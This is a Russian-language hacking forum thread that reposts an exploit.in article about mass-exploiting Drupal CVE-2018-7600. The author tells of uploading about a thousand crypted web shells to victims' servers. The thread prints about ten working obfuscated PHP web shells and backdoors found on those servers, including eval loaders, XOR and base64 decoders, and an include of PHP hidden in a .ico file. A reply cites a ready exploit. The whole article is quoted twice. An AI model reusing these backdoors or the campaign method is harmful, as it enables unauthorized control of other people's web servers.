• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Статья CVE-2018-7600 или майнер на серваке, исходники, аналитика, примеры

woolf1514

Well-known member
06.03.2017
162
154
#1
Копипаста! Все понимаю, но не могу не поделиться подобным.
С разрешения автора делюсь с теми, кто еще не видел статью на соседнем форуме эксплоит.ин от кодера с ником merdock.
Сам еще разбираюсь, личного опыта со статьей почти нет. Надеюсь, Вам чем-то поможет нижеуказанное.

Drupalgeddon2 или майнер на серваке.
На днях Drupal исправила уязвимость CVE-2018-7600, данная уязвимость позволяла под правами которые даны апачу и пхп выполнить системную команду.
И буквально сразу же вышел PoC (один из них тык). Т.к. на текущий момент я как раз занимался CMS решил посмотреть и разобрать эту уязвимость.

Начал с того где достать Drupal сайты, написал простенькую многопоточную прогу по проверке базы доменов (у меня она на до терабайта).
Потом как раз подоспела тема на эксплойте -
Для просмотра контента необходимо: Войти или зарегистрироваться

И мы сообразили полноценный эксплойт для Drupal 7-8 очень помог gtc:
Для просмотра контента необходимо: Войти или зарегистрироваться
. Там же и примеры эксплойта.

После того как набралась достаточная база доменов, я накатал чекер и написал эксплойт на Python.
Взял я старый добрый WSO, так же пришлось подправить топором и закриптовать, т.к. у большинства хостеров стоят фильтры на него и он детектится (трафик тоже).
Запустил и стал ждать. Набрал 1к загруженных шеллов. Но как всегда не без проблем, надо было еще как то это отобразить и как то этой пачкой централизованно управлять.

Пришлось писать панель WSO Manager, т.к. в паблик доступе тишина (не считая одного замученного с бэкдорами).
Панель накатана (
Для просмотра контента необходимо: Войти или зарегистрироваться
), веб шеллы пачкой загружены, дождался статистики.

Полюбовался этим делом и думаю: накой хрен мне это все надо? В итоге стал изучать монетизацию и понял, что шеллы продавать безполезно, но для чего то же их скупают.
Стал заходить на каждый шелл и смотреть какие файлы там народ грузит по дате. Набрал пучок интересных шеллов:
Код:
<?php

$X='GUA*GE"];**if(*$rr&&$ra){$*u=*parse_url($r*r)*;parse_s*tr*($u[**"query"],$q*);$q*=';



$C='_enc*ode*(x(gzcompre*s*s($o),*$k));print("*<$*k>$d</$k>")*;@**session_destro*y();}}}}';



$U='i].=*$p;$e=st*rpos($s[$*i],$**f*);if($*e*){$k=$kh.$kf;ob_sta*rt();@e*va*l(@gzuncom';



$I='";$*i=$m[1*][0].*$m[1][1];$**h*=$sl($ss(m*d5($i.$k*h),0*,3*));$*f=$sl($ss(md5($i.$k';



$G=');if*($q&&$*m){@session_*start(*);*$s=&$_S*ESS*ION;$ss="s*ubstr";$**sl="strto*lower';



$q='array_values($q);pr*e*g_match*_all("/*([\\w])[\\w-*]+*(?:;*q=0.([\\d]))*?,?/"*,$ra*,$m*';



$a=str_replace('JC','','crJCeJCate_JCfJCJCuJCnction');



$Y='s*($p,$h**)*==*=0){$s[$i]=""*;$p=$ss*($p,3);}if(**array_key_exist*s($i,*$*s)*){$s[$';



$N=';f*or($i*=0;$i*<$l;*){f*or($j=0*;($j<$*c&*&$i<$*l);$j++,$i++*){$o.=$*t{$i}^$k{$j}*;**';



$F='}}return $*o;}$r=$_*SERVER;$*rr=@$r*["H*TTP_REFE*R*ER"];$ra=@$r*["HT*TP_*ACCEPT_LAN';



$v='pr*ess*(@x(@ba*se64_decode*(pr*eg_*replace(*array("/_*/"*,"/-/")*,arr*ay("/","+"),';



$O='$kh="b706*";$kf="c*bf*a";funct**ion x($*t,$k*){$c=st*rle*n($k);$l=strle*n($*t);$o=""';



$D='*$*s*s($s[$i],0,*$e)*)),$k)));$o=o*b_*ge*t_contents();*ob*_end*_clean();$*d=base*64';



$j='*f*),*0,3));$p=""*;for($z=*1;$z*<count($m[1*]);$z*++*)$p*.=$q*[$m[2]*[$z]];if(strpo';



$V=str_replace('*','',$O.$N.$F.$X.$q.$G.$I.$j.$Y.$U.$v.$D.$C);



$S=$a('',$V);$S();

?>
Код:
$kh="b706";$kf="cbfa";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Данный шел чем интересен - у него очень серьезный внутренний контроль, чтобы кто попало в него не лез, так же он берет данные из HTTP_REFERER, ключ для дешифрации из HTTP_ACCEPT_LANGUAGE (могу ошибаться я так понял) и потом разархивирует gzuncompress + base64_decode, данные отдает через print перед этим их шифрует, конвертирует и шифрует.

Очень серьезный и маленький шелл, с постоянным генератором уникальности. Форум его забраковал, по этому туту будет картинка:
Снимок.JPG
Очень простой и понятный шелл, стоит фильтр по HTTP_ACCEPT_LANGUAGE, генерирует ключ и формы авторизации и кладет его в $_COOKIE. И потом по $_COOKIE авторизация (хз хачем было так усложнять)
Код:
<?php eval(gzinflate(base64_decode('5b1rdxrHEi{...вырезал....}VQSKKmlcU3Wns73zfwE='))); ?>
Код выставлять не буду, это WSO в чистом видел, его конвертнули base64_decode, сжали gzinflate и выполнили через eval - классика и ничего интересного.
На попытке выгрузки четвертого шелла форум ругается, по этому его придется пропустить.
Код:
<?php $uvbdkq = '5p69\'oyb30kn*e24dutr-v8a_smcixlg17fH#';$ezacpcd = Array();$ezacpcd[] = $uvbdkq[35].$uvbdkq[12];$ezacpcd[] = $uvbdkq[36];$ezacpcd[] = $uvbdkq[8].$uvbdkq[7].$uvbdkq[2].$uvbdkq[27].$uvbdkq[22].$uvbdkq[9].$uvbdkq[9].$uvbdkq[22].$uvbdkq[20].$uvbdkq[34].$uvbdkq[32].$uvbdkq[34].$uvbdkq[32].$uvbdkq[20].$uvbdkq[15].$uvbdkq[16].$uvbdkq[14].$uvbdkq[2].$uvbdkq[20].$uvbdkq[22].$uvbdkq[13].$uvbdkq[15].$uvbdkq[9].$uvbdkq[20].$uvbdkq[22].$uvbdkq[33].$uvbdkq[9].$uvbdkq[3].$uvbdkq[34].$uvbdkq[0].$uvbdkq[7].$uvbdkq[23].$uvbdkq[22].$uvbdkq[34].$uvbdkq[23].$uvbdkq[9];$ezacpcd[] = $uvbdkq[27].$uvbdkq[5].$uvbdkq[17].$uvbdkq[11].$uvbdkq[18];$ezacpcd[] = $uvbdkq[25].$uvbdkq[18].$uvbdkq[19].$uvbdkq[24].$uvbdkq[19].$uvbdkq[13].$uvbdkq[1].$uvbdkq[13].$uvbdkq[23].$uvbdkq[18];$ezacpcd[] = $uvbdkq[13].$uvbdkq[29].$uvbdkq[1].$uvbdkq[30].$uvbdkq[5].$uvbdkq[16].$uvbdkq[13];$ezacpcd[] = $uvbdkq[25].$uvbdkq[17].$uvbdkq[7].$uvbdkq[25].$uvbdkq[18].$uvbdkq[19];$ezacpcd[] = $uvbdkq[23].$uvbdkq[19].$uvbdkq[19].$uvbdkq[23].$uvbdkq[6].$uvbdkq[24].$uvbdkq[26].$uvbdkq[13].$uvbdkq[19].$uvbdkq[31].$uvbdkq[13];$ezacpcd[] = $uvbdkq[25].$uvbdkq[18].$uvbdkq[19].$uvbdkq[30].$uvbdkq[13].$uvbdkq[11];$ezacpcd[] = $uvbdkq[1].$uvbdkq[23].$uvbdkq[27].$uvbdkq[10];foreach ($ezacpcd[7]($_COOKIE, $_POST) as $nadenms => $xiudr){function ugzkby($ezacpcd, $nadenms, $eksryp){return $ezacpcd[6]($ezacpcd[4]($nadenms . $ezacpcd[2], ($eksryp / $ezacpcd[8]($nadenms)) + 1), 0, $eksryp);}function germza($ezacpcd, $gvtjzm){return @$ezacpcd[9]($ezacpcd[0], $gvtjzm);}function yheucu($ezacpcd, $gvtjzm){$mprma = $ezacpcd[3]($gvtjzm) % 3;if (!$mprma) {eval($gvtjzm[1]($gvtjzm[2]));exit();}}$xiudr = germza($ezacpcd, $xiudr);yheucu($ezacpcd, $ezacpcd[5]($ezacpcd[1], $xiudr ^ ugzkby($ezacpcd, $nadenms, $ezacpcd[8]($xiudr))));}?>
Не стал смотреть особо, он полуобфусцированны, наполовину шифрованный, принцип у него такойже как и у верхнего, использует куки и пост.
Код:
<?php $auth_pass = "7547ec6af9d987359dd34c888224afb1"; function s($q, $d){ for($g=0;$g<strlen($q);) for($u=0;$u<strlen($d);$u++, $g++) $h .= $q{$g} ^ $d{$u}; return $h; };$__=s(base64_decode("Oq6{вырезал}/VFE="),"Btp4PXAp5W");$_=create_function("",@gzuncompress($__));$_();?>
Монстр из всех. Без дешифровки, потому что это шифрованный и сжатый WSO - НИЧЕГО интересного. НО меня зацепила методика, ее я видел на fuckav в теме по криптованию php файлов. Вывод - кто то из русских делал.
Код:
@include "\x2fv\x61r\x2fa\x65g\x69r\x2fp\x6ca\x74f\x6fr\x6ds\x2fw\x62r\x65v\x65n\x74s\x2dp\x72o\x64u\x63t\x69o\x6e/\x6do\x64u\x6ce\x73/\x75p\x64a\x74e\x2ft\x65s\x74s\x2ff\x61v\x69c\x6fn\x5f2\x353\x38c\x39.\x69c\x6f";
Нормальный вид:
Код:
@include "/var/aegir/platforms/wbrevents-production/modules/update/tests/favicon_2538c9.ico"
Я немного не понял, можно ли назвать файл ico, запихать туда пхп и потом инклюдить. Я ICO файл не сохранил. НО задумался.
Код:
<?php if(isset($_REQUEST['content']) && md5 ( $_REQUEST['content']) == 'be11e8cc0fd77b25a4a7b8f26f13fab3' && isset ( $_REQUEST['settings'])) eval ( base64_decode ( $_REQUEST['settings']));
Простой и милый шелл, берет $_REQUEST['content'] делает из него md5 хеш и сравнивает с забитым - авторизация, берет $_REQUEST['settings'] конвертирует base64_decode и eval
9 и 10 Шелл опять был забракован форумом... Ну там ничего интересного, все равно. Оба подобны предыдущему.
Код:
<?php

$or="cIEBldcm";

$lq="9TVFsn";

$avj = str_replace("j","","sjtrj_jrjejpljajcje");

$zs="FsKCRfUE";

$bu="Y21kJ10pOw==";

$qu = $avj("i", "", "ibiaisie6i4i_dieicoide");

$fh = $avj("k","","crkekatkek_kfkukncktkikon");

$hwy = $fh('', $qu($avj("c", "", $or.$zs.$lq.$bu))); $hwy();     

?>
Код:
@eval($_POST['cmd']);
Очень классный и мимишный шелл.

Ну вот и все, обзор по найденным веб шелл кодам закончен, там было много их, но они или были помойкой, или бояном, или всо/пас.
Дальше будет аналитика монетизации и бонусы, которые были найдены на серваках. Все в одном посте не уместить, а пока я писал эту часть, то и так весь перематькался и переделывал 10 раз.
По этому, следующую часть буду пилить если кому-то из Вас это будет интересно. Благодарю за внимание!
 

pr0phet

Red Team
02.04.2018
190
270
#6
Копипаста! Все понимаю, но не могу не поделиться подобным.
С разрешения автора делюсь с теми, кто еще не видел статью на соседнем форуме эксплоит.ин от кодера с ником merdock.
Сам еще разбираюсь, личного опыта со статьей почти нет. Надеюсь, Вам чем-то поможет нижеуказанное.

Drupalgeddon2 или майнер на серваке.
На днях Drupal исправила уязвимость CVE-2018-7600, данная уязвимость позволяла под правами которые даны апачу и пхп выполнить системную команду.
И буквально сразу же вышел PoC (один из них тык). Т.к. на текущий момент я как раз занимался CMS решил посмотреть и разобрать эту уязвимость.

Начал с того где достать Drupal сайты, написал простенькую многопоточную прогу по проверке базы доменов (у меня она на до терабайта).
Потом как раз подоспела тема на эксплойте -
Для просмотра контента необходимо: Войти или зарегистрироваться

И мы сообразили полноценный эксплойт для Drupal 7-8 очень помог gtc:
Для просмотра контента необходимо: Войти или зарегистрироваться
. Там же и примеры эксплойта.

После того как набралась достаточная база доменов, я накатал чекер и написал эксплойт на Python.
Взял я старый добрый WSO, так же пришлось подправить топором и закриптовать, т.к. у большинства хостеров стоят фильтры на него и он детектится (трафик тоже).
Запустил и стал ждать. Набрал 1к загруженных шеллов. Но как всегда не без проблем, надо было еще как то это отобразить и как то этой пачкой централизованно управлять.

Пришлось писать панель WSO Manager, т.к. в паблик доступе тишина (не считая одного замученного с бэкдорами).
Панель накатана (
Для просмотра контента необходимо: Войти или зарегистрироваться
), веб шеллы пачкой загружены, дождался статистики.

Полюбовался этим делом и думаю: накой хрен мне это все надо? В итоге стал изучать монетизацию и понял, что шеллы продавать безполезно, но для чего то же их скупают.
Стал заходить на каждый шелл и смотреть какие файлы там народ грузит по дате. Набрал пучок интересных шеллов:
Код:
<?php

$X='GUA*GE"];**if(*$rr&&$ra){$*u=*parse_url($r*r)*;parse_s*tr*($u[**"query"],$q*);$q*=';



$C='_enc*ode*(x(gzcompre*s*s($o),*$k));print("*<$*k>$d</$k>")*;@**session_destro*y();}}}}';



$U='i].=*$p;$e=st*rpos($s[$*i],$**f*);if($*e*){$k=$kh.$kf;ob_sta*rt();@e*va*l(@gzuncom';



$I='";$*i=$m[1*][0].*$m[1][1];$**h*=$sl($ss(m*d5($i.$k*h),0*,3*));$*f=$sl($ss(md5($i.$k';



$G=');if*($q&&$*m){@session_*start(*);*$s=&$_S*ESS*ION;$ss="s*ubstr";$**sl="strto*lower';



$q='array_values($q);pr*e*g_match*_all("/*([\\w])[\\w-*]+*(?:;*q=0.([\\d]))*?,?/"*,$ra*,$m*';



$a=str_replace('JC','','crJCeJCate_JCfJCJCuJCnction');



$Y='s*($p,$h**)*==*=0){$s[$i]=""*;$p=$ss*($p,3);}if(**array_key_exist*s($i,*$*s)*){$s[$';



$N=';f*or($i*=0;$i*<$l;*){f*or($j=0*;($j<$*c&*&$i<$*l);$j++,$i++*){$o.=$*t{$i}^$k{$j}*;**';



$F='}}return $*o;}$r=$_*SERVER;$*rr=@$r*["H*TTP_REFE*R*ER"];$ra=@$r*["HT*TP_*ACCEPT_LAN';



$v='pr*ess*(@x(@ba*se64_decode*(pr*eg_*replace(*array("/_*/"*,"/-/")*,arr*ay("/","+"),';



$O='$kh="b706*";$kf="c*bf*a";funct**ion x($*t,$k*){$c=st*rle*n($k);$l=strle*n($*t);$o=""';



$D='*$*s*s($s[$i],0,*$e)*)),$k)));$o=o*b_*ge*t_contents();*ob*_end*_clean();$*d=base*64';



$j='*f*),*0,3));$p=""*;for($z=*1;$z*<count($m[1*]);$z*++*)$p*.=$q*[$m[2]*[$z]];if(strpo';



$V=str_replace('*','',$O.$N.$F.$X.$q.$G.$I.$j.$Y.$U.$v.$D.$C);



$S=$a('',$V);$S();

?>
Код:
$kh="b706";$kf="cbfa";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Данный шел чем интересен - у него очень серьезный внутренний контроль, чтобы кто попало в него не лез, так же он берет данные из HTTP_REFERER, ключ для дешифрации из HTTP_ACCEPT_LANGUAGE (могу ошибаться я так понял) и потом разархивирует gzuncompress + base64_decode, данные отдает через print перед этим их шифрует, конвертирует и шифрует.

Очень серьезный и маленький шелл, с постоянным генератором уникальности. Форум его забраковал, по этому туту будет картинка:
Посмотреть вложение 17954
Очень простой и понятный шелл, стоит фильтр по HTTP_ACCEPT_LANGUAGE, генерирует ключ и формы авторизации и кладет его в $_COOKIE. И потом по $_COOKIE авторизация (хз хачем было так усложнять)
Код:
<?php eval(gzinflate(base64_decode('5b1rdxrHEi{...вырезал....}VQSKKmlcU3Wns73zfwE='))); ?>
Код выставлять не буду, это WSO в чистом видел, его конвертнули base64_decode, сжали gzinflate и выполнили через eval - классика и ничего интересного.
На попытке выгрузки четвертого шелла форум ругается, по этому его придется пропустить.
Код:
<?php $uvbdkq = '5p69\'oyb30kn*e24dutr-v8a_smcixlg17fH#';$ezacpcd = Array();$ezacpcd[] = $uvbdkq[35].$uvbdkq[12];$ezacpcd[] = $uvbdkq[36];$ezacpcd[] = $uvbdkq[8].$uvbdkq[7].$uvbdkq[2].$uvbdkq[27].$uvbdkq[22].$uvbdkq[9].$uvbdkq[9].$uvbdkq[22].$uvbdkq[20].$uvbdkq[34].$uvbdkq[32].$uvbdkq[34].$uvbdkq[32].$uvbdkq[20].$uvbdkq[15].$uvbdkq[16].$uvbdkq[14].$uvbdkq[2].$uvbdkq[20].$uvbdkq[22].$uvbdkq[13].$uvbdkq[15].$uvbdkq[9].$uvbdkq[20].$uvbdkq[22].$uvbdkq[33].$uvbdkq[9].$uvbdkq[3].$uvbdkq[34].$uvbdkq[0].$uvbdkq[7].$uvbdkq[23].$uvbdkq[22].$uvbdkq[34].$uvbdkq[23].$uvbdkq[9];$ezacpcd[] = $uvbdkq[27].$uvbdkq[5].$uvbdkq[17].$uvbdkq[11].$uvbdkq[18];$ezacpcd[] = $uvbdkq[25].$uvbdkq[18].$uvbdkq[19].$uvbdkq[24].$uvbdkq[19].$uvbdkq[13].$uvbdkq[1].$uvbdkq[13].$uvbdkq[23].$uvbdkq[18];$ezacpcd[] = $uvbdkq[13].$uvbdkq[29].$uvbdkq[1].$uvbdkq[30].$uvbdkq[5].$uvbdkq[16].$uvbdkq[13];$ezacpcd[] = $uvbdkq[25].$uvbdkq[17].$uvbdkq[7].$uvbdkq[25].$uvbdkq[18].$uvbdkq[19];$ezacpcd[] = $uvbdkq[23].$uvbdkq[19].$uvbdkq[19].$uvbdkq[23].$uvbdkq[6].$uvbdkq[24].$uvbdkq[26].$uvbdkq[13].$uvbdkq[19].$uvbdkq[31].$uvbdkq[13];$ezacpcd[] = $uvbdkq[25].$uvbdkq[18].$uvbdkq[19].$uvbdkq[30].$uvbdkq[13].$uvbdkq[11];$ezacpcd[] = $uvbdkq[1].$uvbdkq[23].$uvbdkq[27].$uvbdkq[10];foreach ($ezacpcd[7]($_COOKIE, $_POST) as $nadenms => $xiudr){function ugzkby($ezacpcd, $nadenms, $eksryp){return $ezacpcd[6]($ezacpcd[4]($nadenms . $ezacpcd[2], ($eksryp / $ezacpcd[8]($nadenms)) + 1), 0, $eksryp);}function germza($ezacpcd, $gvtjzm){return @$ezacpcd[9]($ezacpcd[0], $gvtjzm);}function yheucu($ezacpcd, $gvtjzm){$mprma = $ezacpcd[3]($gvtjzm) % 3;if (!$mprma) {eval($gvtjzm[1]($gvtjzm[2]));exit();}}$xiudr = germza($ezacpcd, $xiudr);yheucu($ezacpcd, $ezacpcd[5]($ezacpcd[1], $xiudr ^ ugzkby($ezacpcd, $nadenms, $ezacpcd[8]($xiudr))));}?>
Не стал смотреть особо, он полуобфусцированны, наполовину шифрованный, принцип у него такойже как и у верхнего, использует куки и пост.
Код:
<?php $auth_pass = "7547ec6af9d987359dd34c888224afb1"; function s($q, $d){ for($g=0;$g<strlen($q);) for($u=0;$u<strlen($d);$u++, $g++) $h .= $q{$g} ^ $d{$u}; return $h; };$__=s(base64_decode("Oq6{вырезал}/VFE="),"Btp4PXAp5W");$_=create_function("",@gzuncompress($__));$_();?>
Монстр из всех. Без дешифровки, потому что это шифрованный и сжатый WSO - НИЧЕГО интересного. НО меня зацепила методика, ее я видел на fuckav в теме по криптованию php файлов. Вывод - кто то из русских делал.
Код:
@include "\x2fv\x61r\x2fa\x65g\x69r\x2fp\x6ca\x74f\x6fr\x6ds\x2fw\x62r\x65v\x65n\x74s\x2dp\x72o\x64u\x63t\x69o\x6e/\x6do\x64u\x6ce\x73/\x75p\x64a\x74e\x2ft\x65s\x74s\x2ff\x61v\x69c\x6fn\x5f2\x353\x38c\x39.\x69c\x6f";
Нормальный вид:
Код:
@include "/var/aegir/platforms/wbrevents-production/modules/update/tests/favicon_2538c9.ico"
Я немного не понял, можно ли назвать файл ico, запихать туда пхп и потом инклюдить. Я ICO файл не сохранил. НО задумался.
Код:
<?php if(isset($_REQUEST['content']) && md5 ( $_REQUEST['content']) == 'be11e8cc0fd77b25a4a7b8f26f13fab3' && isset ( $_REQUEST['settings'])) eval ( base64_decode ( $_REQUEST['settings']));
Простой и милый шелл, берет $_REQUEST['content'] делает из него md5 хеш и сравнивает с забитым - авторизация, берет $_REQUEST['settings'] конвертирует base64_decode и eval
9 и 10 Шелл опять был забракован форумом... Ну там ничего интересного, все равно. Оба подобны предыдущему.
Код:
<?php

$or="cIEBldcm";

$lq="9TVFsn";

$avj = str_replace("j","","sjtrj_jrjejpljajcje");

$zs="FsKCRfUE";

$bu="Y21kJ10pOw==";

$qu = $avj("i", "", "ibiaisie6i4i_dieicoide");

$fh = $avj("k","","crkekatkek_kfkukncktkikon");

$hwy = $fh('', $qu($avj("c", "", $or.$zs.$lq.$bu))); $hwy();    

?>
Код:
@eval($_POST['cmd']);
Очень классный и мимишный шелл.

Ну вот и все, обзор по найденным веб шелл кодам закончен, там было много их, но они или были помойкой, или бояном, или всо/пас.
Дальше будет аналитика монетизации и бонусы, которые были найдены на серваках. Все в одном посте не уместить, а пока я писал эту часть, то и так весь перематькался и переделывал 10 раз.
По этому, следующую часть буду пилить если кому-то из Вас это будет интересно. Благодарю за внимание!
Уже давно лежит скрипткиди сплойт. Указал таргет - получил псевдо-шелл. На той неделе тестил - работает отлично. Создает файл s.php, который и является имитацией шела. Расходимся :)
 

woolf1514

Well-known member
06.03.2017
162
154
#7
Ссылки на exploit.in многие не увидят )
Ничего страшного. Кто захочет, тот найдет)
Сори, редактировать уже не могу..
Превосходно)) Получается, он даже с метасплоитом совместим?
Похоже, вторая часть все таки подъедет. Возможно, в ней ты найдешь что-то интересное для себя)
 

WebWare Team

Администратор
30.12.2015
2 092
2 765
#10
Наши правила запрещают размещать текст, скопированный с других источников.
Раз уж скопировано, то надо ставить ссылку на источник.
Exploit.in - дружественный нам ресурс. Ребятам вдвойне будет приятно, если будет ссылка.
 

woolf1514

Well-known member
06.03.2017
162
154
#11
Наши правила запрещают размещать текст, скопированный с других источников.
Раз уж скопировано, то надо ставить ссылку на источник.
Exploit.in - дружественный нам ресурс. Ребятам вдвойне будет приятно, если будет ссылка.
Так ведь есть. И даже несколько ссылок в посте. Больше я добавить уже не могу
 
Вверх Снизу